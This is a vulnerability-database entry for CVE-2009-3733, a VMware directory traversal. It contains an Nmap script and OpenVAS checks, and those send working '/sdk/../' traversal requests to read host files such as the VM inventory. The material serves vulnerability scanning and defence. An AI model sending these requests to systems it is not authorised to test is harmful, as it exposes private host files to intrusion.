VMware Server <= 2.0.1, ESXi Server <= 3.5 Directory Traversal Vulnerability
2014-07-01T00:00:00
ID SSV:86539 Type seebug Reporter Root Modified 2014-07-01T00:00:00
Description
No description provided by source.
source: http://www.securityfocus.com/bid/36842/info
VMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.
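description = [[
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).
]]

---
-- @usage
-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>
-- (the .vmx paths shown below are only printed when Nmap's verbosity is above 1)
--
-- @output
--| http-vmware-path-vuln:
--| VMWare path traversal (CVE-2009-3733): VULNERABLE
--| /vmware/Windows 2003/Windows 2003.vmx
--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx
--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx
--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx
--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx
--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx
--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx
-----------------------------------------------------------------------

author = "Ron Bowes"
license = "Same as Nmap--See http://www.exampel.com/book/man-legal.html"
-- NOTE(review): "default" puts this check into -sC runs, where it requests a
-- host file through the traversal path; confirm that categorisation is intended.
categories = {"vuln", "safe", "default"}

require "http"
-- action() calls nmap.verbosity() and stdnse.format_output(); load both
-- explicitly rather than depending on another module having loaded them.
require "nmap"
require "shortport"
require "stdnse"

-- Run against the usual web ports plus the VMware management ports named in
-- the usage line, or anything detected as http/https.
portrule = shortport.port_or_service({80, 443, 8222,8333}, {"http", "https"})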
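--- Fetch a file from the target through the /sdk/ traversal path.
-- The literal "../" form is tried first, then the "%2E%2E/" encoded form.
-- @param host Host table, passed through to http.get.
-- @param port Port table, passed through to http.get.
-- @param path Absolute path on the target; spaces are sent as %20.
-- @return true, the response body and the request path that worked on
--         success; false and an error message otherwise.
local function get_file(host, port, path)
  -- A usable answer is a 200 carrying a non-empty body. NSE's http library
  -- keeps headers under response.header, so the earlier top-level
  -- 'content-length' lookup was always nil and never rejected an empty reply;
  -- the body itself is checked instead.
  local function usable(response)
    return type(response) == "table"
      and response.status == 200
      and type(response.body) == "string"
      and #response.body > 0
  end

  -- gsub returns (string, count); the parentheses keep only the string.
  local encoded = (string.gsub(path, " ", "%%20"))

  local prefixes = {
    "/sdk/../../../../../../",
    "/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/",
  }

  for _, prefix in ipairs(prefixes) do
    local file = prefix .. encoded
    local result = http.get(host, port, file)
    if usable(result) then
      return true, result.body, file
    end
  end

  return false, "Couldn't download file: " .. encoded
end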
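--- Collect the text between every <tag>...</tag> pair in a string.
-- This is a literal, case-insensitive scan, not an XML parser: attributes,
-- nesting and entities are not handled. Returned values keep the case of the
-- input and are copied verbatim from it, so when the input is a server
-- response they are untrusted text.
-- @param str Document text to scan.
-- @param tag Element name without angle brackets.
-- @return Array of element contents in document order (empty when none).
local function fake_xml_parse(str, tag)
  local found = {}

  -- Search a lowercased copy so matching ignores case, but slice the original.
  local haystack = string.lower(str)
  local name = string.lower(tag)
  local open_tag = "<" .. name .. ">"
  local close_tag = "</" .. name .. ">"

  local cursor = 1
  while true do
    -- Plain find (4th argument) so the tag is never treated as a Lua pattern.
    local _, open_end = string.find(haystack, open_tag, cursor, true)
    if not open_end then
      break
    end

    local close_start, close_end = string.find(haystack, close_tag, open_end + 1, true)
    if not close_start then
      -- Truncated or malformed document: stop instead of doing arithmetic
      -- on nil, and keep whatever was collected so far.
      break
    end

    found[#found + 1] = string.sub(str, open_end + 1, close_start - 1)
    cursor = close_end + 1
  end

  return found
end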
--local function parse_vmware_conf(str, field)
-- local index, value_start = string.find(str, field .. "[^\"]*")
-- if(not(index) or not(value_start)) then
-- return nil
-- end
--
-- local value_end = string.find(str, "\"", value_start + 1)
-- if(not(value_end)) then
-- return nil
-- end
--
-- return string.sub(str, value_start + 1, value_end - 1)
--end
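--- Probe the target by requesting the VMware host inventory file.
-- The response must contain "configroot" (case-insensitive) before it is
-- accepted as the inventory, which filters out servers that answer 200 with
-- unrelated content.
-- @param host Host table, passed through to get_file.
-- @param port Port table, passed through to get_file.
-- @return true and an array of vmxCfgPath values (or a one-item note when the
--         inventory lists none); false and a reason string otherwise.
local function go(host, port)
  local ok, body = get_file(host, port, "/etc/vmware/hostd/vmInventory.xml")

  -- Download failed -- probably not vulnerable. get_file's message already
  -- starts with "Couldn't download file: ", so it is returned unchanged
  -- rather than prefixed a second time.
  if not ok then
    return false, body
  end

  -- A missing body cannot be the inventory; checking the type first avoids
  -- calling string.lower on nil.
  if type(body) ~= "string"
    or string.find(string.lower(body), "configroot", 1, true) == nil then
    return false, "Server didn't return XML -- likely not vulnerable."
  end

  local files = fake_xml_parse(body, "vmxcfgpath")
  if #files == 0 then
    return true, {"No VMs appear to be installed"}
  end

  return true, files
end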
--- NSE entry point: report the host when the inventory file was retrieved.
-- Returns nil (no script output) when the probe fails. The entries returned
-- by go() are appended to the report only when Nmap's verbosity is above 1.
-- @param host Host table supplied by NSE.
-- @param port Port table supplied by NSE.
-- @return Formatted script output, or nil.
action = function(host, port)
  local vulnerable, findings = go(host, port)
  if not vulnerable then
    return nil
  end

  local report = { "VMWare path traversal (CVE-2009-3733): VULNERABLE" }

  if nmap.verbosity() > 1 then
    -- findings is a table; format_output renders it as a nested list.
    report[#report + 1] = findings
  end

  return stdnse.format_output(true, report)
end
{"type": "seebug", "viewCount": 6, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2017-11-19T13:31:50", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3733"]}, {"type": "dsquare", "idList": ["E-193"]}, {"type": "nessus", "idList": ["VMWARE_DIR_TRAVERSAL_VMSA_2009_0015.NASL", "VMWARE_VMSA-2009-0015.NASL", "GENTOO_GLSA-201209-25.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310801144", "OPENVAS:136141256231072459", "OPENVAS:72459", "OPENVAS:104150", "OPENVAS:1361412562310104150", "OPENVAS:1361412562310100502", "OPENVAS:801144"]}, {"type": "nmap", "idList": ["NMAP:HTTP-VMWARE-PATH-VULN.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:33310"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:AC831245A6A9FE7F4A406193FC402095"]}, {"type": "d2", "idList": ["D2SEC_VMWARE", "D2SEC_VMWARE_DIRTRAV"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_SERVER_DIR_TRAV"]}, {"type": "vmware", "idList": ["VMSA-2009-0015"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10360", "SECURITYVULNS:DOC:22713"]}, {"type": "gentoo", "idList": ["GLSA-201209-25"]}], "modified": "2017-11-19T13:31:50", "rev": 2}, "vulnersScore": 5.3}, "reporter": "Root", "title": "VMware Server <= 2.0.1,ESXi Server <= 3.5 Directory Traversal Vulnerability", "cvelist": ["CVE-2009-3733"], "bulletinFamily": "exploit", "sourceHref": "https://www.seebug.org/vuldb/ssvid-86539", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "references": [], "enchantments_done": [], "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "href": "https://www.seebug.org/vuldb/ssvid-86539", "id": "SSV:86539", "status": "cve,poc", "lastseen": "2017-11-19T13:31:50", "sourceData": "\n source: http://www.securityfocus.com/bid/36842/info\r\n\r\nVMware products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied 
input data.\r\n\r\nExploiting the issue may allow an attacker to obtain sensitive information from the host operating system that could aid in further attacks.\r\n\r\ndescription = [[\r\nChecks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733), originally released by Justin Morehouse (justin.morehouse[at)gmail.com) and Tony Flick (tony.flick(at]fyrmassociates.com), and presented at Shmoocon 2010 (http://fyrmassociates.com/tools.html).\r\n]]\r\n\r\n---\r\n-- @usage\r\n-- nmap --script http-vmware-path-vuln -p80,443,8222,8333 <host>\r\n--\r\n-- @output\r\n--| http-vmware-path-vuln: \r\n--| VMWare path traversal (CVE-2009-3733): VULNERABLE\r\n--| /vmware/Windows 2003/Windows 2003.vmx\r\n--| /vmware/Pentest/Pentest - Linux/Linux Pentest Bravo.vmx\r\n--| /vmware/Pentest/Pentest - Windows/Windows 2003.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 7.2/FreeBSD 7.2.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0/FreeBSD 8.0.vmx\r\n--| /mnt/vmware/vmware/FreeBSD 8.0 64-bit/FreeBSD 8.0 64-bit.vmx\r\n--|_ /mnt/vmware/vmware/Slackware 13 32-bit/Slackware 13 32-bit.vmx\r\n-----------------------------------------------------------------------\r\n\r\nauthor = "Ron Bowes"\r\nlicense = "Same as Nmap--See http://www.exampel.com/book/man-legal.html"\r\ncategories = {"vuln", "safe", "default"}\r\n\r\nrequire "http"\r\nrequire "shortport"\r\n\r\nportrule = shortport.port_or_service({80, 443, 8222,8333}, {"http", "https"})\r\n\r\nlocal function get_file(host, port, path)\r\n\tlocal file\r\n\r\n\t-- Replace spaces in the path with %20\r\n\tpath = string.gsub(path, " ", "%%20")\r\n\r\n\t-- Try both ../ and %2E%2E/\r\n\tfile = "/sdk/../../../../../../" .. path\r\n\r\n\tlocal result = http.get( host, port, file)\r\n\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\tfile = "/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/" .. 
path\r\n\t\tresult = http.get( host, port, file)\r\n\r\n\t\tif(result['status'] ~= 200 or result['content-length'] == 0) then\r\n\t\t\treturn false, "Couldn't download file: " .. path\r\n\t\tend\r\n\tend\r\n\r\n\treturn true, result.body, file\r\nend\r\n\r\nlocal function fake_xml_parse(str, tag)\r\n\tlocal result = {}\r\n\tlocal index, tag_start, tag_end\r\n\r\n\t-- Lowercase the 'body' we're searching\r\n\tlocal lc = string.lower(str)\r\n\t-- Lowrcase the tag\r\n\ttag = string.lower(tag)\r\n\r\n\t-- This loop does some ugly pattern-based xml parsing\r\n\tindex, tag_start = string.find(lc, "<" .. tag .. ">")\r\n\twhile index do\r\n\t\ttag_end, index = string.find(lc, "</" .. tag .. ">", index)\r\n\t\ttable.insert(result, string.sub(str, tag_start + 1, tag_end - 1)) -- note: not lowercase\r\n\t\tindex, tag_start = string.find(lc, "<" .. tag .. ">", index)\r\n\tend\r\n\r\n\treturn result\r\nend\r\n\r\n--local function parse_vmware_conf(str, field)\r\n--\tlocal index, value_start = string.find(str, field .. "[^\\"]*")\r\n--\tif(not(index) or not(value_start)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\tlocal value_end = string.find(str, "\\"", value_start + 1)\r\n--\tif(not(value_end)) then\r\n--\t\treturn nil\r\n--\tend\r\n--\r\n--\treturn string.sub(str, value_start + 1, value_end - 1)\r\n--end\r\n\r\nlocal function go(host, port)\r\n\tlocal result, body\r\n\tlocal files\r\n\r\n\t-- Try to download the file\r\n\tresult, body = get_file(host, port, "/etc/vmware/hostd/vmInventory.xml");\r\n\t-- It failed -- probably not vulnerable\r\n\tif(not(result)) then\r\n\t\treturn false, "Couldn't download file: " .. 
body\r\n\tend\r\n\r\n\t-- Check if the file contains the proper XML\r\n\tif(string.find(string.lower(body), "configroot") == nil) then\r\n\t\treturn false, "Server didn't return XML -- likely not vulnerable."\r\n\tend\r\n\r\n\tfiles = fake_xml_parse(body, "vmxcfgpath")\r\n\r\n\tif(#files == 0) then\r\n\t\treturn true, {"No VMs appear to be installed"}\r\n\tend\r\n\r\n\t-- Process each of the .vmx files if verbosity is on\r\n--\tif(nmap.verbosity() > 1) then\r\n--\t\tlocal result, file = get_file(host, port, files[1])\r\n--io.write(nsedebug.tostr(file))\r\n--\tend\r\n\r\n\treturn true, files\r\nend\r\n\r\naction = function(host, port)\r\n\t-- Try a standard ../ path\r\n\tlocal status, result = go(host, port)\r\n\r\n\tif(not(status)) then\r\n\t\treturn nil\r\n\tend\r\n\r\n\tlocal response = {}\r\n\ttable.insert(response, "VMWare path traversal (CVE-2009-3733): VULNERABLE")\r\n\r\n\tif(nmap.verbosity() > 1) then\r\n\t\ttable.insert(response, result)\r\n\tend\r\n\r\n\treturn stdnse.format_output(true, response)\r\nend\r\n\r\n\n ", "published": "2014-07-01T00:00:00", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:40:06", "description": "Directory traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files via unspecified vectors.", "edition": 4, "cvss3": {}, "published": "2009-11-02T15:30:00", "title": "CVE-2009-3733", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3733"], "modified": "2018-10-10T19:47:00", "cpe": ["cpe:/a:vmware:server:1.0.1", "cpe:/a:vmware:esx:3.0.3", "cpe:/a:vmware:server:1.0.4_build_56528", "cpe:/a:vmware:server:1.0", "cpe:/a:vmware:server:1.0.8", "cpe:/a:vmware:esxi:3.5", "cpe:/a:vmware:esx:3.5", "cpe:/a:vmware:server:1.0.9", "cpe:/a:vmware:server:1.0.4", "cpe:/a:vmware:server:1.0.3", "cpe:/a:vmware:server:1.0.1_build_29996", "cpe:/a:vmware:server:2.0.0", "cpe:/a:vmware:server:2.0.1", "cpe:/a:vmware:server:1.0.5", "cpe:/a:vmware:server:1.0.6", "cpe:/a:vmware:server:1.0.7", "cpe:/a:vmware:server:1.0.2"], "id": "CVE-2009-3733", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3733", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:vmware:esxi:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.3:*:*:*:*:*:*:*", 
"cpe:2.3:a:vmware:server:2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.1_build_29996:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:esx:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.4_build_56528:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:server:1.0.4:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2019-05-29T18:40:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "description": "The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.", "modified": "2019-04-30T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENVAS:1361412562310801144", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801144", "type": "openvas", "title": "VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Server Directory Traversal Vulnerability - Nov09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801144\");\n script_version(\"2019-04-30T06:12:35+0000\");\n script_tag(name:\"last_modification\", value:\"2019-04-30 06:12:35 +0000 (Tue, 30 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-11-05 12:25:48 +0100 (Thu, 05 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-3733\");\n script_bugtraq_id(36842);\n script_name(\"VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37186\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3062\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Oct/1023088.html\");\n script_xref(name:\"URL\", value:\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2009-0015.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\", \"VMware/Server/Linux/Ver\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote/local attacker to disclose\n sensitive information.\");\n\n script_tag(name:\"affected\", value:\"VMware Server version 2.0.x prior to 2.0.2 Build 203138,\n VMware Server version 1.0.x prior to 1.0.10 Build 203137 on 
Linux.\");\n\n script_tag(name:\"insight\", value:\"An error exists while handling certain requests can be exploited to download\n arbitrary files from the host system via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade the VMWare product(s) according to the referenced vendor announcement.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/Linux/Installed\")){\n exit(0);\n}\n\nvmserverVer = get_kb_item(\"VMware/Server/Linux/Ver\");\nif(vmserverVer)\n{\n if(version_in_range(version:vmserverVer, test_version:\"1.0\",\n test_version2:\"1.0.9\")||\n version_in_range(version:vmserverVer, test_version:\"2.0\",\n test_version2:\"2.0.1\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-05-12T17:33:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "description": "The host is installed with VMWare product(s)and is prone to multiple\n vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2010-02-23T00:00:00", "id": "OPENVAS:1361412562310100502", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310100502", "type": "openvas", "title": "VMware Products Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMware Products Directory Traversal Vulnerability\n#\n# Authors:\n# Michael Meyer\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 
2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.100502\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-02-23 17:05:07 +0100 (Tue, 23 Feb 2010)\");\n script_bugtraq_id(36842);\n script_cve_id(\"CVE-2009-3733\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_name(\"VMware Products Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Remote file access\");\n script_copyright(\"Copyright (C) 2010 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_esx_web_detect.nasl\", \"gb_vmware_esx_snmp_detect.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 8222);\n script_mandatory_keys(\"VMware/ESX/installed\", \"Host/runs_unixoide\"); # only vmware running under linux is affected\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/37186\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2009/3062\");\n script_xref(name:\"URL\", value:\"http://securitytracker.com/alerts/2009/Oct/1023088.html\");\n script_xref(name:\"URL\", 
value:\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\");\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2009-0015.html\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the remote/local attacker to disclose\n sensitive information.\");\n\n script_tag(name:\"affected\", value:\"VMware Server version 2.0.x prior to 2.0.2 Build 203138,\n VMware Server version 1.0.x prior to 1.0.10 Build 203137 on Linux.\");\n\n script_tag(name:\"insight\", value:\"An error exists while handling certain requests can be exploited to download\n arbitrary files from the host system via directory traversal attacks.\");\n\n script_tag(name:\"solution\", value:\"Upgrade the VMWare product(s) according to the referenced vendor announcement.\");\n\n script_tag(name:\"summary\", value:\"The host is installed with VMWare product(s)and is prone to multiple\n vulnerability.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default:8222);\nres = http_get_cache(item:\"/\", port:port);\n\n# URL based on whether the target is esx/esxi or server\nif(\"VMware ESX\" >< res) {\n path = \"/sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/\";\n} else if(\"<title>VMware Server\" >< res) {\n path = \"/sdk/../../../../../../\";\n} else {\n exit(0); # not vmware\n}\n\nhost = http_host_name(port:port);\n\nreq = http_get(item:\"/ui/\", port:port);\nbuf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);\nif(!buf)\n exit(0);\n\nif(\"Location: https://\" >< buf) # port is redirected, will be checked if the https port is touched...\n exit(0);\n\nfiles = traversal_files(\"linux\");\n\nforeach pattern(keys(files)) {\n\n file = files[pattern];\n\n url = path + file;\n req = string(\"GET \", 
url, \" HTTP/1.1\\r\\n\");\n req += string(\"TE: deflate,gzip;q=0.3\\r\\nConnection: TE, close\\r\\n\");\n req += string(\"Host: \", host, \"\\r\\n\\r\\n\");\n\n buf = http_send_recv(port:port, data:req);\n if(!buf)\n continue;\n\n if(egrep(pattern:pattern, string:buf)) {\n report = http_report_vuln_url(port:port, url:url);\n security_message(port:port, data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-19T10:55:41", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3733"], "description": "The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.", "modified": "2017-07-04T00:00:00", "published": "2009-11-05T00:00:00", "id": "OPENVAS:801144", "href": "http://plugins.openvas.org/nasl.php?oid=801144", "type": "openvas", "title": "VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_serv_dir_trav_vuln_nov09_lin.nasl 6518 2017-07-04 13:49:06Z cfischer $\n#\n# VMware Server Directory Traversal Vulnerability - Nov09 (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will let the remote/local attacker to disclose\n sensitive information.\n Impact Level: System\";\ntag_affected = \"VMware Server version 2.0.x prior to 2.0.2 Build 203138,\n VMware Server version 1.0.x prior to 1.0.10 Build 203137 on Linux.\";\ntag_insight = \"An error exists while handling certain requests can be exploited to download\n arbitrary files from the host system via directory traversal attacks.\";\ntag_solution = \"Upgrade your VMWares according to the below link,\n http://www.vmware.com/security/advisories/VMSA-2009-0015.html\";\ntag_summary = \"The host is installed with VMWare product(s) and is prone to multiple\n vulnerability.\";\n\nif(description)\n{\n script_id(801144);\n script_version(\"$Revision: 6518 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-04 15:49:06 +0200 (Tue, 04 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-05 12:25:48 +0100 (Thu, 05 Nov 2009)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2009-3733\");\n script_bugtraq_id(36842);\n script_name(\"VMware Serve Directory Traversal Vulnerability - Nov09 (Linux)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/37186\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2009/3062\");\n script_xref(name : \"URL\" , value : \"http://securitytracker.com/alerts/2009/Oct/1023088.html\");\n script_xref(name : \"URL\" , value : 
\"http://lists.vmware.com/pipermail/security-announce/2009/000069.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_vmware_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"VMware/Linux/Installed\", \"VMware/Server/Linux/Ver\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\n\nif(!get_kb_item(\"VMware/Linux/Installed\")){\n exit(0);\n}\n\n# Check for VMware Server\nvmserverVer = get_kb_item(\"VMware/Server/Linux/Ver\");\nif(vmserverVer)\n{\n # Check for version 1.0 < 1.0.10 (1.0.10 Build 203137) or 2.0 < 2.0.2 (2.0.2 Build 203138)\n if(version_in_range(version:vmserverVer, test_version:\"1.0\",\n test_version2:\"1.0.9\")||\n version_in_range(version:vmserverVer, test_version:\"2.0\",\n test_version2:\"2.0.1\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-02T21:13:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-1013", "CVE-2009-3733"], "description": "Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).\n\nThe vulnerability was originally released by Justin Morehouse and Tony Flick, who presented at\nShmoocon 2010 